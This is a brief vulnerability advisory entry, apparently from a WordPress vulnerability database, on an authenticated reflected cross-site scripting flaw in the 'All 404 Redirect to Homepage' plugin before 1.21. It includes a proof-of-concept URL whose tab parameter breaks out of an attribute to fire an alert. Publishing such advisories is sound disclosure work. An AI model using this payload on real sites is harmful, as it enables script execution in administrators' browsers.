Lucene search

K
wpexploitWpvulndbWPEX-ID:63D6CA03-E0DF-40DB-9839-531C13619094
HistoryApr 16, 2021 - 12:00 a.m.

All 404 Redirect to Homepage < 1.21 - Authenticated Reflected Cross-Site Scripting (XSS)

2021-04-1600:00:00
wpvulndb
62

0.001 Low

EPSS

Percentile

24.8%

The tab parameter of the settings page of the plugin was vulnerable to an authenticated reflected Cross-Site Scripting (XSS) issue as user input was not properly sanitised before being output in an attribute.

https://example.com/wp-admin/options-general.php?page=all-404-redirect-to-homepage&tab=on%22style%3D%22animation-name%3Arotation%22+onanimationstart%3D%22alert%28origin%29%22%3E

0.001 Low

EPSS

Percentile

24.8%

Related for WPEX-ID:63D6CA03-E0DF-40DB-9839-531C13619094